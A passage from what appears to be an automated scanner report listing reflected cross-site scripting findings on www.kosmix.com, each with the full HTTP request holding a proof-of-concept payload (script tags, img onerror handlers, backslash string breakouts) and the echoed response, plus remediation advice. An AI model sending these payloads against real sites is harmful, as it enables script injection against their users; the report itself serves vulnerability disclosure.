Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:08:03 GMT;path=/
Content-Length: 16718

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="84c71"><img Src=a Onerror=alert(1)>15a60d74c0c - topic_bottom kosmix sem chimborazo 152138.js" />
...[SNIP]...

4.24. http://www.kosmix.com/javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1046b"><script>alert(1)</script>84938fe74ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1046b"><script>alert(1)</script>84938fe74ad/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js?1302898890 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1290282890-1305489649089; __utmz=33745467.1305489787.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=33745467.1661155596.1305489647.1305489647.1305489787.2; __utmc=33745467; __utmb=33745467.1.10.1305489787; kid=320636d0-615c-012e-b1f7-003048fe3090; as=ref_absent; last_referrer=http%3A//burp/show/6; NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:13:10 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=1046b%22%3E%3Cscript%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:13:10 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:15:10 GMT;path=/
Content-Length: 16425

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.kosmix.com/1046b"><script>alert(1)</script>84938fe74ad/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js"/>
...[SNIP]...

4.25. http://www.kosmix.com/javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a3c8"><img%20src%3da%20onerror%3dalert(1)>78dcdd22fe7 was submitted in the REST URL parameter 2. This input was echoed as 2a3c8"><img src=a onerror=alert(1)>78dcdd22fe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /javascripts/2a3c8"><img%20src%3da%20onerror%3dalert(1)>78dcdd22fe7/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js?1302902897 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:16 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:16 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:16 GMT;path=/
Content-Length: 16763

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="2a3c8"><img Src=a Onerror=alert(1)>78dcdd22fe7 - topic_bottom_homepage kosmix sem chimborazo 152138.js" />
...[SNIP]...

4.26. http://www.kosmix.com/javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c19c5\"%3be5be2673620 was submitted in the REST URL parameter 2. This input was echoed as c19c5\\";e5be2673620 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /javascripts/c19c5\"%3be5be2673620/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js?1302902897 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:20 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:20 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:20 GMT;path=/
Content-Length: 16546

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "f062f6f0-615b-012e-931e-003048fe4cb2";
   kl.svid = "1331733948";
   kl.query = "C19c5\\";e5be2673620";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.kosmix.com/";
   kl.build_id = '152138';
   kl.release_
...[SNIP]...

4.27. http://www.kosmix.com/javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bef0"><script>alert(1)</script>733c8f68458 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascripts9bef0"><script>alert(1)</script>733c8f68458/cache/topic_top-s_kosmix-chimborazo-152138.js?1302898890 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1290282890-1305489649089; last_referrer=http%3A//burp/show/6; __utmz=33745467.1305489787.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=33745467.1661155596.1305489647.1305489647.1305489787.2; __utmc=33745467; __utmb=33745467.1.10.1305489787; kid=320636d0-615c-012e-b1f7-003048fe3090; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:14:40 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts9bef0%22%3E%3Cscript%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:14:40 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:16:40 GMT;path=/
Content-Length: 16421

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.kosmix.com/javascripts9bef0"><script>alert(1)</script>733c8f68458/cache/topic_top-s_kosmix-chimborazo-152138.js"/>
...[SNIP]...

4.28. http://www.kosmix.com/javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88e21\"%3b53e7bff7df4 was submitted in the REST URL parameter 2. This input was echoed as 88e21\\";53e7bff7df4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /javascripts/88e21\"%3b53e7bff7df4/topic_top-s_kosmix-chimborazo-152138.js?1302902895 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:49 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:49 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:49 GMT;path=/
Content-Length: 16476

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "f062f6f0-615b-012e-931e-003048fe4cb2";
   kl.svid = "1178061705";
   kl.query = "88e21\\";53e7bff7df4";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.kosmix.com/";
   kl.build_id = '152138';
   kl.release_
...[SNIP]...

4.29. http://www.kosmix.com/javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76346"><img%20src%3da%20onerror%3dalert(1)>137f8037081 was submitted in the REST URL parameter 2. This input was echoed as 76346"><img src=a onerror=alert(1)>137f8037081 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /javascripts/76346"><img%20src%3da%20onerror%3dalert(1)>137f8037081/topic_top-s_kosmix-chimborazo-152138.js?1302902895 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:44 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:44 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:44 GMT;path=/
Content-Length: 16693

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="76346"><img Src=a Onerror=alert(1)>137f8037081 - topic_top s_kosmix chimborazo 152138.js" />
...[SNIP]...

4.30. http://www.kosmix.com/stylesheets/cache/topic-s_kosmix-chimborazo-152138.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /stylesheets/cache/topic-s_kosmix-chimborazo-152138.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12978"><script>alert(1)</script>c053c831743 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets12978"><script>alert(1)</script>c053c831743/cache/topic-s_kosmix-chimborazo-152138.css?1305486595 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1290282890-1305489649089; last_referrer=http%3A//burp/show/6; __utmz=33745467.1305489787.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=33745467.1661155596.1305489647.1305489647.1305489787.2; __utmc=33745467; __utmb=33745467.1.10.1305489787; kid=320636d0-615c-012e-b1f7-003048fe3090; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:15:06 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=stylesheets12978%22%3E%3Cscript%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:15:05 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:17:06 GMT;path=/
Content-Length: 16415

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.kosmix.com/stylesheets12978"><script>alert(1)</script>c053c831743/cache/topic-s_kosmix-chimborazo-152138.css"/>
...[SNIP]...

4.31. http://www.kosmix.com/stylesheets/cache/topic-s_kosmix-chimborazo-152138.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /stylesheets/cache/topic-s_kosmix-chimborazo-152138.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e702"><img%20src%3da%20onerror%3dalert(1)>8f650b987d1 was submitted in the REST URL parameter 2. This input was echoed as 4e702"><img src=a onerror=alert(1)>8f650b987d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /stylesheets/4e702"><img%20src%3da%20onerror%3dalert(1)>8f650b987d1/topic-s_kosmix-chimborazo-152138.css?1305488471 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:58 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=stylesheets; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:58 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:58 GMT;path=/
Content-Length: 16678

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="4e702"><img Src=a Onerror=alert(1)>8f650b987d1 - topic s_kosmix chimborazo 152138.css" />
...[SNIP]...

4.32. http://www.kosmix.com/stylesheets/cache/topic-s_kosmix-chimborazo-152138.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kosmix.com
Path:   /stylesheets/cache/topic-s_kosmix-chimborazo-152138.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60518\"%3b762b8c58dd7 was submitted in the REST URL parameter 2. This input was echoed as 60518\\";762b8c58dd7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /stylesheets/60518\"%3b762b8c58dd7/topic-s_kosmix-chimborazo-152138.css?1305488471 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:06:01 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=stylesheets; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:06:01 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:08:01 GMT;path=/
Content-Length: 16460

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "f062f6f0-615b-012e-931e-003048fe4cb2";
   kl.svid = "367250210";
   kl.query = "60518\\";762b8c58dd7";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.kosmix.com/";
   kl.build_id = '152138';
   kl.release_
...[SNIP]...

4.33. http://www.kosmix.com/stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4edc7"><script>alert(1)</script>2f8f59fa7df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets4edc7"><script>alert(1)</script>2f8f59fa7df/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css?1304450625 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1290282890-1305489649089; last_referrer=http%3A//burp/show/6; __utmz=33745467.1305489787.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=33745467.1661155596.1305489647.1305489647.1305489787.2; __utmc=33745467; __utmb=33745467.1.10.1305489787; kid=320636d0-615c-012e-b1f7-003048fe3090; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:12:51 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=stylesheets4edc7%22%3E%3Cscript%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:12:51 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:14:51 GMT;path=/
Content-Length: 16440

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.kosmix.com/stylesheets4edc7"><script>alert(1)</script>2f8f59fa7df/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css"/>
...[SNIP]...

4.34. http://www.kosmix.com/stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf0bb"><img%20src%3da%20onerror%3dalert(1)>a86826fda4 was submitted in the REST URL parameter 2. This input was echoed as cf0bb"><img src=a onerror=alert(1)>a86826fda4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /stylesheets/cf0bb"><img%20src%3da%20onerror%3dalert(1)>a86826fda4/topic_page_redesign-s_kosmix-chimborazo-152138.css?1304450611 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:04:45 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=stylesheets; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:04:45 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:06:45 GMT;path=/
Content-Length: 16737

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Cf0bb"><img Src=a Onerror=alert(1)>a86826fda4 - topic_page_redesign s_kosmix chimborazo 152138.css" />
...[SNIP]...

